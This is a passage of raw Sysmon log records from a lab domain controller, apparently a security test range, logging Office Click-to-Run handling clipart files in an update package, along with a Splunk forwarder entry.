Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00526_.WMFMD5=7495ED85BDC568B1147EC47DE99202DB,SHA256=FD67DBCB60652CE4F413E049F29456013B4475069ED1520B9A4C85E92D6C2D8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00525_.WMFMD5=96A6BCA737B16E5AAC5AD5C263F86AC2,SHA256=8934DFAA8C45BE1304A3B2B2128AFD61B1A1648F1C4C14ED4AFA0D058D9B7842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00524_.WMFMD5=F4EBDF8B41B74B6B16B6F8620070F27E,SHA256=BC3D0B0A3892515D08C3B547F12E8C6DC9FE7709893978473D122881CA67635A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00392_.WMFMD5=0F5A5495EA68AE4217A80D0F363AB610,SHA256=37D5D5C8EC24B0D171EB7BE5E38ED2DCF8770D0F620D8E9544269D269C57B8E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00390_.WMFMD5=AD85A98915A6E7F79544A76E3EA7FBE3,SHA256=3DFEB71E29A1FD6E331E74B1B154AB63C8593A8B86B3B45097F56E3DC7501B81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00296_.WMFMD5=1221CD74F3E249E74DB74D16720133A5,SHA256=B91B69E5EBDC4D67F86A650532D20095490EE7312D38AC41A3058DF78A551896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00274_.WMFMD5=E2066338D806156138B3644D49CE9AE1,SHA256=92FF506F34282C80913DE88C113727BF96F0CD412D6F41D2AC1D5183DC067CC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00273_.WMFMD5=D734FBC8A090C5094BDC56916366CDC8,SHA256=B7FD368E0FAF7ECF2A91449C051E135078508902040BA7DCDAA4EB852267BFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00270_.WMFMD5=FDC3090808F103089385564BCF5909B0,SHA256=C55BF22F538886D9391916CFB4C368995F5DD6DB90D7D07E91533AC0E16FBA4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00269_.WMFMD5=48737753335F0A6C8E4064DE5FF41B6F,SHA256=8D170E045B9196BF4176A99636D17F75F3E6DFFD3E40291BDE6D703EC230E44A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00267_.WMFMD5=B08CBDF8E54F990EE3893F777F516CDB,SHA256=858F573D3E6943698376F6B41B74A571211553FD07BAB29BD8DE5E62BB1E6880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00265_.WMFMD5=A359F8EC432A8857C37587BCCACEC9AA,SHA256=BEBDA40FEC5A6BF83C49A166EEA74077FF727BC68D61F1EBB0F50CE99001BF8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00262_.WMFMD5=52C60B73D45A1F01910597811276C380,SHA256=97E7B989E6FC227914AA4FB7883BEE142A07AD1B90387645A2B8B350535980A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00261_.WMFMD5=A2312BA7E32AF05FBA1A4E62F1498348,SHA256=CC84604456F7D56E764E512C10633B1C0CEBEA11BD011E474F4A3B0D8E1F510C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00254_.WMFMD5=DEBA7E916D86AA5A86AD16E1D856ECFA,SHA256=AB90513A37CFEC483ADE13A083F856056186CC4265D1154A7FD259CA0CA6DD00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00252_.WMFMD5=C42335700CFB235D86A7F9A7BD7E4123,SHA256=CD3236C11B05377F45154A56B48FC544E923E44D6F337E2FAC7B40232444E237,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00248_.WMFMD5=C11590ADBCCB261A8ACD0FBFB99176C5,SHA256=F1D903613384DD98D40D28380EB7FCEBB9DD3B64A130EDDEA058AD2D1B6D6B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00247_.WMFMD5=87FE1CBD1BF4440BFB1D4DF2EE2D6678,SHA256=1F8099E4A75027D87D30D6F7877B8CB9681BEBBE77588C6EF961831FD148E67C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00242_.WMFMD5=D226271898086F562163E3E2437CDF3D,SHA256=ED81C2549393BF51E8DE91B20A6CC9F91F0BD04B124D49C19F2D31FC51BCE45E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00234_.WMFMD5=CFFDBEA51786BADDD1A77B92A80A4B07,SHA256=81436C08BE99A9D56504AB4937B0A389FCCAEC1B7B72CEA54848979CB27205FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00195_.WMFMD5=ED6BF64C2239077BE768BC17D137DAE5,SHA256=3C7765971517BD4605D227E78822206FBF4A2D8DFA899D1CE38E2219C8DA37BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00194_.WMFMD5=F4997320353C357F10925920D1CBB6CA,SHA256=CD96D028E8AFAAF6293D0FF11B3E95D9C2CBFD73B5D1BC410B99106D9BF69911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00152_.WMFMD5=A83901913BEB72B5DF600232B66ACE58,SHA256=D9EBF25F039389CAF603AC328B67432C6BCE59489DA65101B95A6BABE789B1B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00148_.WMFMD5=CDBD4719649B86DB54C925FCA777F41D,SHA256=392C564A7D1C7446DB3A28F71797A5E63C31C199B872ED5FD05489D6F14D578E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00130_.WMFMD5=43CB46968F190FF76ABC76FAE469566B,SHA256=63586D39920BC0E8D8E5C94CB8568AAC7E531C959B2BDAA31AECC7DB4BCE988D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00122_.WMFMD5=B5516257BECF013F8D140CC89E853172,SHA256=C055480AF121F2180E4D1DB8FC689CC1B6E34A0DC8B567492668CF9AC6871456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00105_.WMFMD5=44494523387494BCEE526700EF5462B9,SHA256=28F927247B34AAFCED081CEE4F481CA598E072E538BA4574D31D3C4A233E0A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00098_.WMFMD5=3BEF1301FD37CD508390C67E2AA2632D,SHA256=A1B64ACF1B39AD6E61846761A5E15F29FEC56C3066B94B31DD74ED7E86154072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00045_.WMFMD5=33D750DEF3E99AA9DE103F9AC20BE8F9,SHA256=B86A2BE698C9208A3C5DFCD3BFE64663600C6F3083451765DAB0630BCDC98C4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00012_.WMFMD5=A14A55237B8CBF64A3A45197C97FA7B8,SHA256=6FFF69CBD216F04743DA6CF36FA398183488EE7DFCF7B0FAC38A986948A6E654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BL00008_.WMFMD5=E491B4D3FCFA778BD88EDF894DD592E3,SHA256=6BE0531236ACF33A98E25CB07BA38872579DF59470A499D4632C90FA046FE3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD20013_.WMFMD5=2B02776A4CD7E7A83542BFD21236D638,SHA256=FA14994191E281E37CC8C22C4A6C49ADB8D789FE975AD04428DB8FB3DB5C7049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19988_.WMFMD5=C377C2A58FC14547815212A8EA9CAAE1,SHA256=A2CE8368ABC65C1C011C816CDD84ECBDB28888A3A5DFCCC6B9F0C9F764CDD55C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19986_.WMFMD5=8AC4432E89C73013BBF7A75BDA20ADE0,SHA256=CDC7FDCAA46273984FB31DE0FED0A7AF9C30A90B076B494887DBDDDB1DE1EC89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19828_.WMFMD5=72B33B17CC62128C5CFB41A92A4EB055,SHA256=105DC4B506A29F34AFCFF0B8BB096770AD3D24700BF20B72757EBDA1F8605948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19827_.WMFMD5=C21465CD247F3750603C88123FB60F26,SHA256=0E473D1CCBBD9AE74FC02CFA76D800242C2BAFA7EA7B8FFC1A188BDD129BAD0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19695_.WMFMD5=0297635E32E9589C797DEC178AF4D207,SHA256=445213266764F92BF27A543DDBFFF65C75D4DA72F59FE8AD2D6A08FEC57D1B71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19582_.GIFMD5=0E72F85B8C0C597279C8AAAE3B1ACFF4,SHA256=0B96C616FA61FC89D9979F09A53739E966FB456BBBFAC094900D3E06E6768AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C337A5978BD0DFC82EB8B27BF32D0C30,SHA256=A7DE709489AF7A9D61D828BE438B1379745EBD7F610DF3C375E7D15C758B9C3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD19563_.GIFMD5=A352C1C826DB3F462547706BDD8AED84,SHA256=4B84F479D03D460A8BB2B25D7CF30C7664657CF279D28F1DD5438280DF5F2A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD10972_.GIFMD5=9E3486DCACAE26FAF429FAA54A6226E3,SHA256=1AF37E60B173656080052A2A513BB7A38A323D7E4503AA7BD0D72B31121F1E85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD10890_.GIFMD5=C1F1B8AA5F0D4EE1F51230605BAF12A6,SHA256=DE293FCD20A2185CA1F10CCDEBE6E7B3D93786459BD40CA5D5E4CC8D5F7223CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD09664_.WMFMD5=DD87A0126E966267207AA167B3A40120,SHA256=2FE861C5683E59562323449F371F8A0C730BE240895CAE857570A1732DE16EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD09662_.WMFMD5=10A81F200CE1B2D1A61F7D9B755F73A2,SHA256=6ADE9D57ECDF03B1F75010CFFBBC6F4347209AFEA0AA24C8344B93032FC6A257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD09194_.WMFMD5=13A099DD57C09581DB894A8DD22B1D73,SHA256=DE1544DABBD65C26992565017A4358F8336FFE8F55C30264D5D5CBE38A0A0D12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 